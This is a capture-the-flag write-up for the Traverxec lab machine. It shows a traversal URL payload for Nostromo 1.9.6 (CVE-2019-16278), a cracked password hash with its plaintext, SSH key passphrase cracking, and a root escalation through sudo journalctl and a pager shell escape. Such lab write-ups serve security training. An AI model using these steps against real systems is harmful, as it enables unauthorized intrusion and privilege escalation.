Traverxec writeup

Traverxec - 10.10.10.165



We first start with the nmap scan nmap -p- -T4 -A -oN nmap.txt 10.10.10.165

  • -p- to scan all the ports
  • -T4 to increase the scan speed (T5 is the fastest and T0 is the slowest)
  • -A to run scripts, do version checks on services we find, detect the OS and do a traceroute (this is equal to running -sC -sV -O --traceroute)
  • -oN to save the output just as plain text

we get the following output:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

As we can see, only port 22 and port 80 are open. Port 22 runs SSH and port 80 runs the Nostromo webserver (version 1.9.6). If we google for Nostromo 1.9.6 we find that it is vulnerable to cve-2019-16278 and there is a python script to exploit this on exploit-db.com

It seems that Nostromo version 1.9.6 and lower are vulnerable to a directory traversal which allows us to execute code on the server. Trying this in the URL with http://10.10.10.165/.%0d./.%0d./.%0d./.%0d./.%0d./ shows us we can actually use this exploit:

So now we can use the python code from exploit-db by running the script and feeding in 3 options: <scriptname>.py 10.10.10.165 80 <cmd>. This way we can look around the system and find the home directory for user david, sadly we are not allowed in his home folder as we are connecting as user www-data. This does allow us to look around in the /var/nostromo/ folder. Here we discover a configuration file /var/nostromo/conf/nhttpd.conf and read the content:

# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

Here we can see 2 interesting things:

  • there is a .htpasswd file
  • there is a public part to the home directory

First let's look at the .htpasswd file and start cracking the password for: david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ which comes back as Nowonly4me

Now we can have a look at the public part of the home directory, searching for the Nostromo web server results in a manual which tells us we can go to the home directory by adding ~<username> to the url. So let's go to http://10.10.10.165/~david/ where we land on an empty page: David's homepage

But now we know there is a folder in his home directory called public_www and if take a look there we find there is a subfolder protected-file-area so we go back to the browser and type in: http://10.10.10.165/~david/protected-file-area/ and now we can download the backup-ssh-identity-files.tgz and extract the SSH private key. We do need to crack the password on this key, for this we first need to create a file that johnTheRipper can read. There is a tool for this called ssh2john, now if we crack this file we get the password hunter. Now we are ready to logon to the machine over ssh: ssh -i id_rsa david@10.10.10.165 and enter the password.

Now we can read the user.txt


Now to root:

The first thing we notice is a bin folder, inside there are 2 files:

  • server-stats.head
  • server-stats.sh

If we read the server-stats.sh file we see the following code:

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

It looks like we have SUDO rights on the journalctl command, but only in a specific way: /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service which forces us to only read the last 5 lines and wont allow us to use the GTFOBins exploit by default.

As this exploit needs the command to end-up in less. We can however force this by making the screen really small, this way the output won't fit on the screen and journalctl will once again go into less.

Now we can type the command !/bin/sh and get a root shell.